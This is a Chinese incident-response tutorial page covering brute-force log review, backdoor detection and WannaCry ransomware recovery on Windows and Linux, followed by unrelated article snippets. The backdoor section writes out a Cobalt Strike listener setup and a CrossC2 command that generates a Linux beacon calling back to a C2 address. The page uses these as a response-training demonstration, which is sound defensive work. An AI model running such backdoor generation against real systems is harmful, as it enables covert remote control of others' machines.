74 应急响应-winlinux分析后门勒索病毒攻击

news2024/11/15 8:45:37

目录

    • 操作系统(windows,linux)应急响应:
      • 常见日志类别及存储:
      • 补充资料:
      • 病毒分析
      • 病毒查杀
      • 病毒动态
      • 在线病毒扫描网站
    • 演示案例:
      • 攻击响应-暴力破解(RDP,SSH)-Win,Linux
      • 控制响应-后门木马(Webshell,PC)-Win,Linux
      • 危害响应-病毒感染(勒索WannaCry)-Windows
      • 自动化响应检测-Gscan多重功能脚本测试-Linux
      • 下载地址:

在这里插入图片描述

操作系统(windows,linux)应急响应:

1.常见危害: 暴力破解,漏洞利用,流量攻击,木马控制(webshell,PC木马等),病毒感染(挖矿,蠕虫,勒索等)。

流量攻击:只是会对数据和服务器的正常运转、运行会受到干扰,但是他不会把你服务器上的权限和敏感的东西泄露出去,也不会造成服务器上的数据和权限丢失
对方通过一些漏洞或者权限得到服务器的权限之后,实现木马或者病毒上面的一些感染,来危害到服务器的正常运行,导致服务器异常
pc木马(控制系统的木马)、网站木马,根据当前操作系统windows和linux、mac os,这里网上都有相对应的系统,还有一些app的,这里我们主要介绍的是pc
这个木马需要用到第三方软件,因为现在出现了很多免杀木马,有时候杀毒软件查杀不到,这个时候就需要借助于我们人为的去分析,那些程序在运行过程中有异常,来判定出这个程序有后门,并且找到这个后门一步步到服务器上面去
当前在我们互联网比较出名的挖矿程序和勒索

2.常见分析: 计算机账户,端口,进程,网络,启动,服务,任务,文件等安全问题
看一下计算机上面有没有一些新增的,账户有没有异常,一般攻击者会留一个后门账户,方便他下次的连接,这个是有一定经验的
判断出服务器上端口的连接情况,有没有一些后门进程,对外部的一些连接
还有些进程信息能直接了然的看到,系统自带的进程,第三方应用的进程,还有一些不知道的进程,来判定出有没有一些可疑进程在执行
网络就和端口差不多,根据当前的网络环境来判断
服务器在重启之后,会自动加载一些程序或者应用
木马在控制的时候为了保持权限一直存在,当服务器重启之后,木马会失效,但是这个木马为了长期控制,他就会把木马写到系统项和服务名,或者是注册表里面,当服务器重启之后,还会加载这些东西,那么木马会再去重新运行上线,实现重新控制,所以这些地方真的要去看
看一下文件有没有被泄露,有没有被更改权限,有没有被进行恶意的删除,那这些东西都要进行分析的

常见日志类别及存储:

Windows,Linux
我们一定要借助日志,这攻击是如何实现的,日志里面有些类别,有给予这个应用服务器日志、系统日志,比如一些登录事件,什么时候登录过这台服务器,什么时候注销过这台服务器,这些信息都在日志里面有保存,进一步分析攻击者在服务器上做了那些事情,存储表示日志会储存在那些地方,能不能修改

补充资料:

应急响应大合集:https://xz.aliyun.com/t/485
史上最全Windows安全工具锦集:https://www.secpulse.com/archives/114019.html
系统内部:https://learn.microsoft.com/en-us/sysinternals/
提供windows自带工具,好处在于用起来非常方便,不会涉及到杀毒软件误杀,运行不了的情况

病毒分析

PCHunter:http://www.xuetr.com
火绒剑:https://www.huorong.cn
Process Explorer:https://docs.microsoft.com/zh-cn/sysinternals/downloads/process-explorer
processhacker:https://processhacker.sourceforge.io/downloads.php
autoruns:https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns
OTL:https://www.bleepingcomputer.com/download/otl/
SysInspector:http://download.eset.com.cn/download/detail/?product=sysinspector

病毒查杀

卡巴斯基:http://devbuilds.kaspersky-labs.com/devbuilds/KVRT/latest/full/KVRT.exe
大蜘蛛:http://free.drweb.ru/download+cureit+free
火绒安全软件:https://www.huorong.cn
360 杀毒:http://sd.360.cn/download_center.html

病毒动态

CVERC-国家计算机病毒应急处理中心:http://www.cverc.org.cn
微步在线威胁情报社区:https://x.threatbook.cn
火绒安全论坛:http://bbs.huorong.cn/forum-59-1.html
爱毒霸社区:http://bbs.duba.net
腾讯电脑管家:http://bbs.guanjia.qq.com/forum-2-1.html

在线病毒扫描网站

http://www.virscan.org / /多引擎在线病毒扫描网
https://habo.qq.com / /腾讯哈勃分析系统
https://virusscan.jotti.org / /Jotti 恶意软件扫描系统
http://www.scanvir.com //计算机病毒、手机病毒、可疑文件分析

演示案例:

攻击响应-暴力破解(RDP,SSH)-Win,Linux

在这里插入图片描述
Windows-LogFusion载入查看:
事件归类,事件ID,事件状态等,参考百度资料
Linux-grep筛选:
1、统计了下日志,确认服务器遭受多少次暴力破解
grep -o “Failed password” /var/log/secureluniq -c
2、输出登录爆破的第一行和最后一行,确认爆破时间范围:
grep “Failed password” /var/log/secure l head -1
grep “Failed password” /var/log/secure l tail -1
3、进一步定位有哪些IP在爆破?
在这里插入图片描述
在这里插入图片描述
我们不确定对方采用什么攻击方式,所以我们都要看,有可能是漏洞有可能是暴力破解,暴力破解就跟日志挂的会比较深入一点,因为漏洞会有些日志记录不上

控制响应-后门木马(Webshell,PC)-Win,Linux

windows: 默认配置测试
linux借助CrossC2项目: netstat -ntulp
https://github.com/gloxec/CrossC2
https://github.com/darkr4y/geacon
参考过程: http://www.adminxe.com/1287.html
1.项目上传至服务端目录,给予执行权限
2.配置监听器:
windows/beacon_https/reverse_https 阿里云记得端口放行
3.生成后门:
./genCrossC2.Linux 47.99.49.65 5566 null null Linux x64 C2
通过网络监听工具及windows日志分析或执行记录查找后门问题

windows上面的一个木马,我们用到的控制木马是cs,常见安全攻击工具cs,然后去分析一下这个木马,如何去判定他,在实战情况下,我们可以借助杀毒软件,来对服务器的其它文件进行扫描,探针有没有可疑的木马病毒

cs面向的是windows的渗透项目,但是后期经过其它人的更改,后面也支持linux的上线
cs支持情况
在这里插入图片描述

危害响应-病毒感染(勒索WannaCry)-Windows

详细说明中毒表现及恢复指南
https://lesuobingdu.360.cn/
https://www.nomoreransom.org/zh/index.html
做勒索病毒查看演示的话,一定要小心在小心,本机没有装补丁或者没有拦截可能自己感染,那就很尴尬
中毒的表现就是会把你所有的文档文件都给改了,突然一下弹了个窗口,然后就变成这样了,文件啥都看不到了
在这里插入图片描述
编辑打开就是txt内容,但这里打开就会变成这样子,让你交钱解密
在这里插入图片描述
病毒样本,网上也能下到,演示的话,最好是放到虚拟机上去运行,不要放在本机上面搞,到时候又要重装电脑搞一些东西
我们不是研究病毒,研究逆向这块的,他的技术属于逆向这块的技术,
在线解密,把我们上传的留言文件,还有上传加密文件,因为它会对文档进行加密,办公的一些文档资料全部加密了,打不开
能不能解密成功,就看勒索病毒厉不厉害,再就看平台支不支持
有些勒索病毒实在是没有办法,这个时候可以尝试找花钱的网站去尝试一下,当然花钱也不一定能够搞出来
有的是基于漏洞的,ms17-010,还有一种是没有打补丁,系统本身存在系统漏洞;自己在网站上面乱七八遭的乱下,导致的
不要乱下,长期打补丁,并且更新杀毒软件,在服务器上保持干净,不要乱下一些乱七八遭的软件,中毒还有一种情况是被别人给危害了,可能你的内网主机,之前勒索病毒爆发的时候,出过爆发漏洞,然后进行内网渗透,自带感染,但是我们要想到,他是基于漏洞的,提前做好补丁,安装好防护的话,其实是能够直接解决这个问题的,总的来说就是管理员的疏忽,没有定期的更新补丁,做好漏洞的防范,就不会导致这样的事情
解密就是免费工具或者花钱

自动化响应检测-Gscan多重功能脚本测试-Linux

GScan文件对比,可以去学习一下

木马和病毒是两方面,木马主要是为了控制,病毒是一个恶意的程序,他会把你服务器上正常的东西搞得不正常,木马不会影响到你正常的情况,你的服务器会被他实时监控

下载地址:

https://github.com/gloxec/CrossC2
https://github.com/darkr4y/geacon/
https://github.com/grayddq/GScan/
https://bbs.pediy.com/thread-217586-1.htm
https://www.nomoreransom.org/zh/index.html
https://docs.microsoft.com/en-us/sysinternals/
https://www.secpulse.com/archives/114019.html
https://pan.baidu.com/s/1tQS1mUelmEh3168AL7yXGg 提取码: xiao

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1131470.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

VSCode 设置热更新

热更新:文件保存后页面自动刷新,用于提高开发效率。 1.打开应用商店,搜索 live server ,选择第一个,点击安装。 2.随便打开一个 HTML 文件,在文件中右键点击,选择 Open with Live Server 打开网…

Python的pip包管理器介绍和使用

Python的pip包管理器介绍和使用 什么是pip? pip是Python的软件包管理器,它可以方便地安装、升级和卸载Python软件包。它是Python的标准包管理器,自Python 3.4版本开始,已经内置在Python中。 使用pip,你可以轻松地安…

docker安装centos7进入后不显示当前路径的解决记录

本文记录一个小问题(仅此而已): 最近我的mac使用docker安装了centos,但是每次(使用 docker exec -it f925c71d28ef48e7b66ed93555e30e6c272727eecd5285639b6a66c5231a99b2 /bin/sh)进入到centos时候,都不显示当前路径,只有一个 sh…

小程序设计基本微信小程序的校园生活助手系统

项目介绍 通篇文章的撰写基础是实际的应用需要,然后在架构系统之前全面复习大学所修习的相关知识以及网络提供的技术应用教程,以校园生活助手系统的实际应用需要出发,架构系统来改善现校园生活助手系统工作流程繁琐等问题。不仅如此以操作者…

抖音招聘直播报白:短视频流量红利和精准推送,让招聘更精准

抖音直播招聘报白是通过抖音直播方式展现职位信息,并与求职者进行互动的招聘方式。在抖音平台上,企业或者人力资源公司可以通过直播的形式,将职位以视频直播的方式展现出来。通过抖音直播招聘报白,企业或者人力资源公司可以利用抖…

Python 算法高级篇:贪心算法的原理与应用

Python 算法高级篇:贪心算法的原理与应用 引言 1. 什么是贪心算法?2. 贪心算法的应用2.1 最小生成树- Prim 算法2.2 背包问题2.3 哈夫曼编码 3. 代码示例3.1 会议室安排问题 4. 总结 引言 贪心算法是一种基于启发式的问题解决方法,它通过每一…

众和策略:配债不够10张怎么办?

近年来,跟着金融商场的展开和各类企业的资金需求增加,债券商场规划逐步扩展。债券作为一种重要的信誉工具,为企业融资供应了一个灵敏的渠道。但是,在进行债券发行时,有时候或许会遇到一个问题,那就是配债数…

Games104现代游戏引擎笔记 网络游戏架构基础

挑战1:网络同步 挑战2:是网络的可靠性,包括应对网络的延迟,丢包和掉线 挑战3: 反作弊和安全系统,因为网络游戏的本质是经济系统 挑战4:多样性(不同设备,不同服务器),在不停服的情况下热更新 挑战5:大量人数时对高并发…

68 买卖股票的最佳时机

买卖股票的最佳时机 题解1 贪心题解2 DP 给定一个数组 prices ,它的第 i 个元素 prices[i] 表示一支给定股票第 i 天的价格。 你只能选择 某一天 买入这只股票,并选择在 未来的某一个不同的日子 卖出该股票。设计一个算法来计算你所能获取的最大利润。…

[④ADRV902x]: Digital Filter Configuration(发射端)

前言 与接收端相反的,发射端链路filter是对信号做interpolation处理,增加信号采样率。 Transmitter Signal Path INT5:5倍上采,filter系数固定,可以选择采用INT5或者THB3和THB2的组合。Transmit Half-Band 3 Filter …

Spring Boot 配置邮件发送服务

文章归档&#xff1a;https://www.yuque.com/u27599042/coding_star/ctwkrus1r9zrytsq spring boot 版本 3.1.3 邮件发送服务使用的 QQ 邮箱提供的 依赖 <parent><groupId>org.springframework.boot</groupId><artifactId>spring-boot-starter-parent…

Linux CentOS 8(firewalld的配置与管理)

Linux CentOS 8&#xff08;firewalld的配置与管理&#xff09; 目录 一、firewalld 简介二、firewalld 工作概念1、预定义区域&#xff08;管理员可以自定义修改&#xff09;2、预定义服务 三、firewalld 配置方法1、通过firewall-cmd配置2、通过firewall图形界面配置 四、配置…

UUID转16字节数组(Java)

最近在写协议的时候&#xff0c;遇到需要将一个36字符长度的UUID转为长度为16的字节数组&#xff1b; 这样处理的话那我们就需要保证唯一性和可还原&#xff1b; 于是我使用了下面的方式&#xff1a; /*** uuid转16字节数组** param uuidStr* return*/private static byte[] …

国产服务器安装onlyoffice详细教程

1.通过docker安装onlyoffice 找一台能访问互联网的服务器下载onlyoffice镜像 sudo docker pull onlyoffice/documentserver查看镜像 docker images 启动onlyoffice docker run -itd \ --name onlyoffice1 \ --restart always \ -p 8099:80 \ -v /data/docker/onlyoffice/lo…

浅谈食品加工厂能耗情况分析平台解决方案

叶根胜 安科瑞电气股份有限公司 上海嘉定 201801 摘要&#xff1a;本文对某小型食品加工厂能源消耗进行了评价&#xff0c;分析了该工厂节能减排的潜力空间。有关节能减排效率的因素包括工厂的技术水准、管理方法和发展规模。依据研究提出对节能减排制度建设等方面的创新建议…

SpringCloud Alibaba【一】简单介绍

SpringCloud 提起微服务&#xff0c;不得不提 Spring Cloud 全家桶系列&#xff0c;Spring Cloud 是一个服务治理平台&#xff0c;是若干个框架的集合&#xff0c;提供了全套的分布式系统解决方案。包含了&#xff1a;服务注册与发现、配置中心、服务网关、智能路由、负载均衡…

生成式 AI 如何释放开发者的生产力?

生成式 AI 可以将程序员的开发速率提高两倍。技术管理者有望通过 AIGC 应用&#xff0c;大幅缩短四类关键开发任务的完成时间&#xff0c;进而提升组织生产力。 ——麦肯锡《通过生成式 AI 释放开发者生产力》 01 生成式 AI 将如何影响研发效能&#xff1f; 麦肯锡最近的一项实…

如果你要去拜访国外客户需要做哪些准备

由于产品不同&#xff0c;我们出国拜访客户的机会很少&#xff0c;一般出去都是受客户邀请&#xff0c;会同时带上设计师或者工程师&#xff0c;很少有独自出国的&#xff0c;毕竟样品是没法带的&#xff0c;最多只能带上画册和项目图。 想起几年前&#xff0c;公司要出国参展…

MIT6.5830 Lab1-GoDB实验记录(一)

MIT6.5830 Lab1-GoDB实验记录&#xff08;一&#xff09; – WhiteNights Site 标签&#xff1a;Golang, 数据库 了解接下来的实验要做什么。 实验目的 实现GoDB 从lab1开始一直到实验结束&#xff0c;我们的目的只有一个–实现GoDB&#xff0c;一个基础的数据库管理系统。而…

派克斯电脑全局改IP如何辅助捉妖游戏

捉妖游戏是一款非常受欢迎的手机游戏&#xff0c;玩家需要通过探索地图来捉到各种可爱的妖精。为了让游戏更具趣味性&#xff0c;玩家可以通过地图制作来设计自己的捉妖之旅。在这篇教程中&#xff0c;我们将向您展示如何使用电脑全局软件工具——派克斯&#xff0c;来制作捉妖…